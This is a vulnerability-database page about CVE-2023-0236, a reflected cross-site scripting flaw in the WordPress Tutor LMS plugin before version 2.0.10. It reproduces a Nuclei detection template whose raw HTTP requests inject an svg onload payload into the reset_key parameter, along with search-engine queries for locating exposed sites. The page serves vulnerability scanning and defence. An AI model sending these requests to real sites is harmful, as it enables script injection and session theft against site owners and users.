Lucene search

WordPress Tutor LMS <2.0.10 - Cross Site Scripting

🗓️ 18 Mar 2023 22:09:07Reported by ProjectDiscoveryType

WordPress Tutor LMS plugin <2.0.10 XSS vulnerabilit

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 8
Cvelist	CVE-2023-0236 Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting	6 Feb 202319:59	–	cvelist
WPVulnDB	Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting	12 Jan 202300:00	–	wpvulndb
NVD	CVE-2023-0236	6 Feb 202320:15	–	nvd
Patchstack	WordPress Tutor LMS Plugin < 2.0.10 is vulnerable to Cross Site Scripting (XSS)	12 Jan 202300:00	–	patchstack
wpexploit	Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting	12 Jan 202300:00	–	wpexploit
Vulnrichment	CVE-2023-0236 Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting	6 Feb 202319:59	–	vulnrichment
CVE	CVE-2023-0236	6 Feb 202320:15	–	cve
Prion	Cross site scripting	6 Feb 202320:15	–	prion

Source	Link
wpscan	www.wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8
nvd	www.nvd.nist.gov/vuln/detail/CVE-2023-0236
github	www.github.com/ARPSyndicate/cvemon

id: CVE-2023-0236

info:
  name: WordPress Tutor LMS <2.0.10 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 2.0.10.
  reference:
    - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0236
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0236
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.46131
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/tutor/
    fofa-query: body=/wp-content/plugins/tutor/
    publicwww-query: /wp-content/plugins/tutor/
  tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<svg onload=prompt(document.domain)>")'
          - 'contains(body_2, "Instructor Registration")'
        condition: and
# digest: 490a004630440220575eb062e03fb8379304dbeb619e2bc3be9e1a8fa5353867f3916ea91a8dcbae0220786dead8edea3a7040cf56b5d4bff582b39159bb59b5195c0a9f14ed5f285c3f:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

18 Mar 2023 22:07Current

6.1Medium risk

Vulners AI Score6.1

CVSS36.1

EPSS0.25069

SSVC